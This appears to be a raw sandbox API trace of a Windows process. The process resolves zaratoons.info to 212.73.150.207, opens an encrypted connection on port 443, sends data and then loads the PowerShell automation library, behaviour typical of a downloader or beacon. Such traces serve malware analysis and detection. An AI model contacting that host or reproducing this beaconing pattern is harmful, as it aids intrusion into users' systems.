	[0736.168] WSAIoctl (in: s=0x3d8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c8fdcf0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c8fdcf0, lpOverlapped=0x0) returned -1
	[0736.170] CoTaskMemAlloc (cb=0x204) returned 0x302050
	[0736.170] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x302050, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0737.629] CoTaskMemFree (pv=0x302050) 
	[0737.630] WSAEventSelect (s=0x3d8, hEventObject=0x3e4, lNetworkEvents=512) returned 0
	[0737.630] WSAIoctl (in: s=0x3e8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c8fdcf0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c8fdcf0, lpOverlapped=0x0) returned -1
	[0737.630] CoTaskMemAlloc (cb=0x204) returned 0x302050
	[0737.630] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x302050, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0737.630] CoTaskMemFree (pv=0x302050) 
	[0737.630] WSAEventSelect (s=0x3e8, hEventObject=0x3ec, lNetworkEvents=512) returned 0
	[0737.630] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f0
	[0737.631] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x3f0, param_3=0x3) returned 0x0
	[0739.221] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c8fde30 | out: phkResult=0x1c8fde30*=0x40c) returned 0x0
	[0739.223] RegOpenKeyExW (in: hKey=0x40c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c8fdd18 | out: phkResult=0x1c8fdd18*=0x410) returned 0x0
	[0739.223] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x414
	[0739.224] RegNotifyChangeKeyValue (hKey=0x410, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x414, fAsynchronous=1) returned 0x0
	[0739.224] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c8fdd40 | out: phkResult=0x1c8fdd40*=0x418) returned 0x0
	[0739.225] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x41c
	[0739.225] RegNotifyChangeKeyValue (hKey=0x418, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x41c, fAsynchronous=1) returned 0x0
	[0739.225] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c8fdd40 | out: phkResult=0x1c8fdd40*=0x420) returned 0x0
	[0739.225] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x424
	[0739.225] RegNotifyChangeKeyValue (hKey=0x420, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x424, fAsynchronous=1) returned 0x0
	[0739.225] GetCurrentProcess () returned 0xffffffffffffffff
	[0739.225] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fdca8 | out: TokenHandle=0x1c8fdca8*=0x428) returned 1
	[0739.233] GetCurrentProcess () returned 0xffffffffffffffff
	[0739.233] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fd478 | out: TokenHandle=0x1c8fd478*=0x42c) returned 1
	[0739.238] GetCurrentProcess () returned 0xffffffffffffffff
	[0739.238] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fd478 | out: TokenHandle=0x1c8fd478*=0x430) returned 1
	[0747.572] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c8fdd78 | out: pProxyConfig=0x1c8fdd78) returned 1
	[0750.782] SetEvent (hEvent=0x3b0) returned 1
	[0756.479] GetCurrentProcess () returned 0xffffffffffffffff
	[0756.479] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fd4e8 | out: TokenHandle=0x1c8fd4e8*=0x488) returned 1
	[0756.482] GetCurrentProcess () returned 0xffffffffffffffff
	[0756.482] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fd4e8 | out: TokenHandle=0x1c8fd4e8*=0x48c) returned 1
	[0757.831] SetEvent (hEvent=0x3b0) returned 1
	[0765.128] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c8fd9b8 | out: pFixedInfo=0x0, pOutBufLen=0x1c8fd9b8) returned 0x6f
	[0772.028] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b87d940
	[0772.028] GetNetworkParams (in: pFixedInfo=0x1b87d940, pOutBufLen=0x1c8fd9b8 | out: pFixedInfo=0x1b87d940, pOutBufLen=0x1c8fd9b8) returned 0x0
	[0778.756] CoTaskMemAlloc (cb=0xd) returned 0x1b867a10
	[0778.756] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0778.756] CoTaskMemFree (pv=0x1b867a10) 
	[0778.759] LocalFree (hMem=0x1b87d940) returned 0x0
	[0779.149] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x49c
	[0779.154] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3dc
	[0779.156] CoTaskMemAlloc (cb=0x10) returned 0x1b867a10
	[0779.157] getaddrinfo (in: pNodeName="zaratoons.info", pServiceName=0x0, pHints=0x1c8fd960*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c8fd958 | out: ppResult=0x1c8fd958*=0x1b871250*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="zaratoons.info", ai_addr=0x1b867f90*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) returned 0
	[0784.213] CoTaskMemFree (pv=0x1b867a10) 
	[0784.213] CoTaskMemFree (pv=0x0) 
	[0784.214] FreeAddrInfoW (pAddrInfo=0x1b871250*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="慺慲潴湯⹳湩潦", ai_addr=0x1b867f90*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) 
	[0784.215] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4ac
	[0784.215] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d0
	[0784.216] ioctlsocket (in: s=0x4ac, cmd=-2147195266, argp=0x1c8fd978 | out: argp=0x1c8fd978) returned 0
	[0784.216] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3d4
	[0784.216] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x430
	[0784.216] ioctlsocket (in: s=0x3d4, cmd=-2147195266, argp=0x1c8fd978 | out: argp=0x1c8fd978) returned 0
	[0784.216] WSAIoctl (in: s=0x4ac, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c8fd8f0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c8fd8f0, lpOverlapped=0x0) returned -1
	[0784.216] CoTaskMemAlloc (cb=0x204) returned 0x302680
	[0784.216] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x302680, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0784.216] CoTaskMemFree (pv=0x302680) 
	[0784.216] WSAEventSelect (s=0x4ac, hEventObject=0x3d0, lNetworkEvents=512) returned 0
	[0784.216] WSAIoctl (in: s=0x3d4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c8fd8f0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c8fd8f0, lpOverlapped=0x0) returned -1
	[0784.217] CoTaskMemAlloc (cb=0x204) returned 0x302680
	[0784.217] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x302680, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0784.217] CoTaskMemFree (pv=0x302680) 
	[0784.217] WSAEventSelect (s=0x3d4, hEventObject=0x430, lNetworkEvents=512) returned 0
	[0784.280] GetAdaptersAddresses () returned 0x6f
	[0785.035] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b885c30
	[0785.035] GetAdaptersAddresses () returned 0x0
	[0786.295] LocalFree (hMem=0x1b885c30) returned 0x0
	[0786.298] WSAConnect (in: s=0x49c, name=0x2f9db08*(sa_family=2, sin_port=0x1bb, sin_addr="212.73.150.207"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0786.514] closesocket (s=0x3dc) returned 0
	[0788.346] EnumerateSecurityPackagesW (in: pcPackages=0x1c8fd7d8, ppPackageInfo=0x1c8fd7d0 | out: pcPackages=0x1c8fd7d8, ppPackageInfo=0x1c8fd7d0) returned 0x0
	[0788.350] lstrlenW (lpString="Negotiate") returned 9
	[0788.351] CoTaskMemAlloc (cb=0x16) returned 0x1b867f50
	[0788.351] RtlMoveMemory (in: Destination=0x1b867f50, Source=0x2e0b90, Length=0x14 | out: Destination=0x1b867f50) 
	[0788.351] CoTaskMemFree (pv=0x1b867f50) 
	[0788.352] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0788.352] CoTaskMemAlloc (cb=0x3c) returned 0x1b8747f0
	[0788.352] RtlMoveMemory (in: Destination=0x1b8747f0, Source=0x2e0ba4, Length=0x3a | out: Destination=0x1b8747f0) 
	[0788.352] CoTaskMemFree (pv=0x1b8747f0) 
	[0788.352] lstrlenW (lpString="NegoExtender") returned 12
	[0788.352] CoTaskMemAlloc (cb=0x1c) returned 0x1b875ea0
	[0788.352] RtlMoveMemory (in: Destination=0x1b875ea0, Source=0x2e0bde, Length=0x1a | out: Destination=0x1b875ea0) 
	[0788.352] CoTaskMemFree (pv=0x1b875ea0) 
	[0788.352] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0788.352] CoTaskMemAlloc (cb=0x3e) returned 0x1b8747f0
	[0788.352] RtlMoveMemory (in: Destination=0x1b8747f0, Source=0x2e0bf8, Length=0x3c | out: Destination=0x1b8747f0) 
	[0788.352] CoTaskMemFree (pv=0x1b8747f0) 
	[0788.352] lstrlenW (lpString="Kerberos") returned 8
	[0788.352] CoTaskMemAlloc (cb=0x14) returned 0x1b867f50
	[0788.352] RtlMoveMemory (in: Destination=0x1b867f50, Source=0x2e0c34, Length=0x12 | out: Destination=0x1b867f50) 
	[0788.352] CoTaskMemFree (pv=0x1b867f50) 
	[0788.352] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0788.353] CoTaskMemAlloc (cb=0x32) returned 0x1b870f90
	[0788.353] RtlMoveMemory (in: Destination=0x1b870f90, Source=0x2e0c46, Length=0x30 | out: Destination=0x1b870f90) 
	[0788.353] CoTaskMemFree (pv=0x1b870f90) 
	[0788.353] lstrlenW (lpString="NTLM") returned 4
	[0788.353] CoTaskMemAlloc (cb=0xc) returned 0x1b867f50
	[0788.353] RtlMoveMemory (in: Destination=0x1b867f50, Source=0x2e0c76, Length=0xa | out: Destination=0x1b867f50) 
	[0788.353] CoTaskMemFree (pv=0x1b867f50) 
	[0788.353] lstrlenW (lpString="NTLM Security Package") returned 21
	[0788.353] CoTaskMemAlloc (cb=0x2e) returned 0x1b870f90
	[0788.353] RtlMoveMemory (in: Destination=0x1b870f90, Source=0x2e0c80, Length=0x2c | out: Destination=0x1b870f90) 
	[0788.353] CoTaskMemFree (pv=0x1b870f90) 
	[0788.353] lstrlenW (lpString="Schannel") returned 8
	[0788.353] CoTaskMemAlloc (cb=0x14) returned 0x1b867f50
	[0788.353] RtlMoveMemory (in: Destination=0x1b867f50, Source=0x2e0cac, Length=0x12 | out: Destination=0x1b867f50) 
	[0788.353] CoTaskMemFree (pv=0x1b867f50) 
	[0788.353] lstrlenW (lpString="Schannel Security Package") returned 25
	[0788.353] CoTaskMemAlloc (cb=0x36) returned 0x1b870f90
	[0788.353] RtlMoveMemory (in: Destination=0x1b870f90, Source=0x2e0cbe, Length=0x34 | out: Destination=0x1b870f90) 
	[0788.353] CoTaskMemFree (pv=0x1b870f90) 
	[0788.354] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0788.354] CoTaskMemAlloc (cb=0x5c) returned 0x1b8615e0
	[0788.354] RtlMoveMemory (in: Destination=0x1b8615e0, Source=0x2e0cf2, Length=0x5a | out: Destination=0x1b8615e0) 
	[0788.354] CoTaskMemFree (pv=0x1b8615e0) 
	[0788.354] lstrlenW (lpString="Schannel Security Package") returned 25
	[0788.354] CoTaskMemAlloc (cb=0x36) returned 0x1b870f90
	[0788.354] RtlMoveMemory (in: Destination=0x1b870f90, Source=0x2e0d4c, Length=0x34 | out: Destination=0x1b870f90) 
	[0788.354] CoTaskMemFree (pv=0x1b870f90) 
	[0788.354] lstrlenW (lpString="WDigest") returned 7
	[0788.354] CoTaskMemAlloc (cb=0x12) returned 0x1b867f50
	[0788.354] RtlMoveMemory (in: Destination=0x1b867f50, Source=0x2e0d80, Length=0x10 | out: Destination=0x1b867f50) 
	[0788.354] CoTaskMemFree (pv=0x1b867f50) 
	[0788.354] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0788.354] CoTaskMemAlloc (cb=0x46) returned 0x1b8747f0
	[0788.354] RtlMoveMemory (in: Destination=0x1b8747f0, Source=0x2e0d90, Length=0x44 | out: Destination=0x1b8747f0) 
	[0788.354] CoTaskMemFree (pv=0x1b8747f0) 
	[0788.354] lstrlenW (lpString="TSSSP") returned 5
	[0788.354] CoTaskMemAlloc (cb=0xe) returned 0x1b867f50
	[0788.354] RtlMoveMemory (in: Destination=0x1b867f50, Source=0x2e0dd4, Length=0xc | out: Destination=0x1b867f50) 
	[0788.354] CoTaskMemFree (pv=0x1b867f50) 
	[0788.355] lstrlenW (lpString="TS Service Security Package") returned 27
	[0788.355] CoTaskMemAlloc (cb=0x3a) returned 0x1b8747f0
	[0788.355] RtlMoveMemory (in: Destination=0x1b8747f0, Source=0x2e0de0, Length=0x38 | out: Destination=0x1b8747f0) 
	[0788.355] CoTaskMemFree (pv=0x1b8747f0) 
	[0788.355] lstrlenW (lpString="pku2u") returned 5
	[0788.355] CoTaskMemAlloc (cb=0xe) returned 0x1b867f50
	[0788.355] RtlMoveMemory (in: Destination=0x1b867f50, Source=0x2e0e18, Length=0xc | out: Destination=0x1b867f50) 
	[0788.355] CoTaskMemFree (pv=0x1b867f50) 
	[0788.355] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0788.355] CoTaskMemAlloc (cb=0x30) returned 0x1b870f90
	[0788.355] RtlMoveMemory (in: Destination=0x1b870f90, Source=0x2e0e24, Length=0x2e | out: Destination=0x1b870f90) 
	[0788.355] CoTaskMemFree (pv=0x1b870f90) 
	[0788.355] lstrlenW (lpString="CREDSSP") returned 7
	[0788.355] CoTaskMemAlloc (cb=0x12) returned 0x1b867f50
	[0788.355] RtlMoveMemory (in: Destination=0x1b867f50, Source=0x2e0e52, Length=0x10 | out: Destination=0x1b867f50) 
	[0788.355] CoTaskMemFree (pv=0x1b867f50) 
	[0788.355] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0788.355] CoTaskMemAlloc (cb=0x4a) returned 0x1b87fee0
	[0788.355] RtlMoveMemory (in: Destination=0x1b87fee0, Source=0x2e0e62, Length=0x48 | out: Destination=0x1b87fee0) 
	[0788.356] CoTaskMemFree (pv=0x1b87fee0) 
	[0788.356] FreeContextBuffer (in: pvContextBuffer=0x2e0a50 | out: pvContextBuffer=0x2e0a50) returned 0x0
	[0789.346] GetCurrentProcess () returned 0xffffffffffffffff
	[0789.346] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fd2b8 | out: TokenHandle=0x1c8fd2b8*=0x3dc) returned 1
	[0789.350] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2fa1cc0, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c8fd1c8, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c8fd1b8, ptsExpiry=0x1c8fd1b0 | out: phCredential=0x1c8fd1b8, ptsExpiry=0x1c8fd1b0) returned 0x0
	[0789.358] InitializeSecurityContextW (in: phCredential=0x1c8fd3c0, phContext=0x0, pTargetName=0x2f966e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c8fd3b0, pOutput=0x2fa4408, pfContextAttr=0x1c8fd3a8, ptsExpiry=0x1c8fd3a0 | out: phNewContext=0x1c8fd3b0, pOutput=0x2fa4408, pfContextAttr=0x1c8fd3a8, ptsExpiry=0x1c8fd3a0) returned 0x90312
	[0789.359] FreeContextBuffer (in: pvContextBuffer=0x2f1b30 | out: pvContextBuffer=0x2f1b30) returned 0x0
	[0804.194] send (s=0x49c, buf=0x2fa44d8*, len=118, flags=0) returned 118
	[0804.195] recv (in: s=0x49c, buf=0x2fa44d8, len=5, flags=0 | out: buf=0x2fa44d8*) returned 5
	[0804.291] recv (in: s=0x49c, buf=0x2fa44dd, len=93, flags=0 | out: buf=0x2fa44dd*) returned 93
	[0804.293] InitializeSecurityContextW (in: phCredential=0x1c8fd2e0, phContext=0x1c8fd590, pTargetName=0x2f966e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fa47e8, Reserved2=0x0, phNewContext=0x1c8fd2d0, pOutput=0x2fa4808, pfContextAttr=0x1c8fd2c8, ptsExpiry=0x1c8fd2c0 | out: phNewContext=0x1c8fd2d0, pOutput=0x2fa4808, pfContextAttr=0x1c8fd2c8, ptsExpiry=0x1c8fd2c0) returned 0x90312
	[0804.294] recv (in: s=0x49c, buf=0x2fa48f8, len=5, flags=0 | out: buf=0x2fa48f8*) returned 5
	[0804.294] recv (in: s=0x49c, buf=0x2fa491d, len=2556, flags=0 | out: buf=0x2fa491d*) returned 2556
	[0804.295] InitializeSecurityContextW (in: phCredential=0x1c8fd210, phContext=0x1c8fd4c0, pTargetName=0x2f966e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fa53f0, Reserved2=0x0, phNewContext=0x1c8fd200, pOutput=0x2fa5410, pfContextAttr=0x1c8fd1f8, ptsExpiry=0x1c8fd1f0 | out: phNewContext=0x1c8fd200, pOutput=0x2fa5410, pfContextAttr=0x1c8fd1f8, ptsExpiry=0x1c8fd1f0) returned 0x90312
	[0804.319] recv (in: s=0x49c, buf=0x2fa5500, len=5, flags=0 | out: buf=0x2fa5500*) returned 5
	[0804.319] recv (in: s=0x49c, buf=0x2fa5525, len=331, flags=0 | out: buf=0x2fa5525*) returned 331
	[0804.319] InitializeSecurityContextW (in: phCredential=0x1c8fd140, phContext=0x1c8fd3f0, pTargetName=0x2f966e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fa5740, Reserved2=0x0, phNewContext=0x1c8fd130, pOutput=0x2fa5760, pfContextAttr=0x1c8fd128, ptsExpiry=0x1c8fd120 | out: phNewContext=0x1c8fd130, pOutput=0x2fa5760, pfContextAttr=0x1c8fd128, ptsExpiry=0x1c8fd120) returned 0x90312
	[0804.322] recv (in: s=0x49c, buf=0x2fa5850, len=5, flags=0 | out: buf=0x2fa5850*) returned 5
	[0804.322] recv (in: s=0x49c, buf=0x2fa5875, len=4, flags=0 | out: buf=0x2fa5875*) returned 4
	[0804.322] InitializeSecurityContextW (in: phCredential=0x1c8fd070, phContext=0x1c8fd320, pTargetName=0x2f966e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fa5950, Reserved2=0x0, phNewContext=0x1c8fd060, pOutput=0x2fa5970, pfContextAttr=0x1c8fd058, ptsExpiry=0x1c8fd050 | out: phNewContext=0x1c8fd060, pOutput=0x2fa5970, pfContextAttr=0x1c8fd058, ptsExpiry=0x1c8fd050) returned 0x90312
	[0804.378] FreeContextBuffer (in: pvContextBuffer=0x1b862b50 | out: pvContextBuffer=0x1b862b50) returned 0x0
	[0804.378] send (s=0x49c, buf=0x2fa5a40*, len=134, flags=0) returned 134
	[0804.378] recv (in: s=0x49c, buf=0x2fa5a40, len=5, flags=0 | out: buf=0x2fa5a40*) returned 5
	[0804.475] recv (in: s=0x49c, buf=0x2fa5a45, len=1, flags=0 | out: buf=0x2fa5a45*) returned 1
	[0804.476] InitializeSecurityContextW (in: phCredential=0x1c8fcfa0, phContext=0x1c8fd250, pTargetName=0x2f966e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fa5bb8, Reserved2=0x0, phNewContext=0x1c8fcf90, pOutput=0x2fa5bd8, pfContextAttr=0x1c8fcf88, ptsExpiry=0x1c8fcf80 | out: phNewContext=0x1c8fcf90, pOutput=0x2fa5bd8, pfContextAttr=0x1c8fcf88, ptsExpiry=0x1c8fcf80) returned 0x90312
	[0804.477] recv (in: s=0x49c, buf=0x2fa5cc8, len=5, flags=0 | out: buf=0x2fa5cc8*) returned 5
	[0804.477] recv (in: s=0x49c, buf=0x2fa5ced, len=48, flags=0 | out: buf=0x2fa5ced*) returned 48
	[0804.477] InitializeSecurityContextW (in: phCredential=0x1c8fced0, phContext=0x1c8fd180, pTargetName=0x2f966e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fa5df0, Reserved2=0x0, phNewContext=0x1c8fcec0, pOutput=0x2fa5e10, pfContextAttr=0x1c8fceb8, ptsExpiry=0x1c8fceb0 | out: phNewContext=0x1c8fcec0, pOutput=0x2fa5e10, pfContextAttr=0x1c8fceb8, ptsExpiry=0x1c8fceb0) returned 0x0
	[0805.200] QueryContextAttributesW (in: phContext=0x1c8fd130, ulAttribute=0x4, pBuffer=0x2fa5f28 | out: pBuffer=0x2fa5f28) returned 0x0
	[0806.278] QueryContextAttributesW (in: phContext=0x1c8fd130, ulAttribute=0x5a, pBuffer=0x2fa5fa8 | out: pBuffer=0x2fa5fa8) returned 0x0
	[0806.292] QueryContextAttributesW (in: phContext=0x1c8fcfe0, ulAttribute=0x53, pBuffer=0x2fa62f8 | out: pBuffer=0x2fa62f8) returned 0x0
	[0810.409] CertDuplicateCRLContext (pCrlContext=0x1b85f790) returned 0x1b85f790
	[0810.412] CertDuplicateStore (hCertStore=0x1b868db0) returned 0x1b868db0
	[0810.413] CertEnumCertificatesInStore (hCertStore=0x1b868db0, pPrevCertContext=0x0) returned 0x1b85f810
	[0810.413] CertDuplicateCRLContext (pCrlContext=0x1b85f810) returned 0x1b85f810
	[0810.414] CertEnumCertificatesInStore (hCertStore=0x1b868db0, pPrevCertContext=0x1b85f810) returned 0x1b85f790
	[0810.414] CertDuplicateCRLContext (pCrlContext=0x1b85f790) returned 0x1b85f790
	[0810.414] CertEnumCertificatesInStore (hCertStore=0x1b868db0, pPrevCertContext=0x1b85f790) returned 0x0
	[0810.414] CertCloseStore (hCertStore=0x1b868db0, dwFlags=0x0) returned 1
	[0810.414] CertFreeCRLContext (pCrlContext=0x1b85f790) returned 1
	[0811.549] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x1b8678c0
	[0811.550] CertAddCRLLinkToStore (in: hCertStore=0x1b8678c0, pCrlContext=0x1b85f810, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0813.068] CertAddCRLLinkToStore (in: hCertStore=0x1b8678c0, pCrlContext=0x1b85f790, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0824.183] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b85f790, pTime=0x1c8fcfe8, hAdditionalStore=0x1b8678c0, pChainPara=0x1c8fcff0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c8fcfe0 | out: ppChainContext=0x1c8fcfe0) returned 1
	[0848.267] CertDuplicateCertificateChain (pChainContext=0x1cd2f460) returned 0x1cd2f460
	[0848.269] CertDuplicateCRLContext (pCrlContext=0x1b85f790) returned 0x1b85f790
	[0848.269] CertDuplicateCRLContext (pCrlContext=0x1cd77880) returned 0x1cd77880
	[0848.270] CertDuplicateCRLContext (pCrlContext=0x1cd77900) returned 0x1cd77900
	[0848.270] CertFreeCertificateChain (pChainContext=0x1cd2f460) 
	[0848.271] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1cd2f460, pPolicyPara=0x1c8fd168, pPolicyStatus=0x1c8fd148 | out: pPolicyStatus=0x1c8fd148) returned 1
	[0848.272] SetLastError (dwErrCode=0x0) 
	[0848.277] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1cd2f460, pPolicyPara=0x1c8fd240, pPolicyStatus=0x1c8fd228 | out: pPolicyStatus=0x1c8fd228) returned 1
	[0857.419] CertFreeCertificateChain (pChainContext=0x1cd2f460) 
	[0857.419] CertFreeCRLContext (pCrlContext=0x1b85f790) returned 1
	[0858.443] EncryptMessage (in: phContext=0x1c8fd7f0, fQOP=0x0, pMessage=0x2fa8ba0, MessageSeqNo=0x0 | out: pMessage=0x2fa8ba0) returned 0x0
	[0858.443] send (s=0x49c, buf=0x2fa88e0*, len=117, flags=0) returned 117
	[0859.825] setsockopt (s=0x49c, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0
	[0859.826] recv (in: s=0x49c, buf=0x2fa8d48, len=5, flags=0 | out: buf=0x2fa8d48) returned -1
	[0859.827] WSAEventSelect (s=0x49c, hEventObject=0x0, lNetworkEvents=0) returned 0
	[0859.827] CoTaskMemAlloc (cb=0x204) returned 0x3032e0
	[0859.827] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2745, dwLanguageId=0x0, lpBuffer=0x3032e0, nSize=0x101, Arguments=0x0 | out: lpBuffer="An established connection was aborted by the software in your host machine.\r\n") returned 0x4d
	[0859.827] CoTaskMemFree (pv=0x3032e0) 
	[0918.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c8f9240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c8f9190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c8f9190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
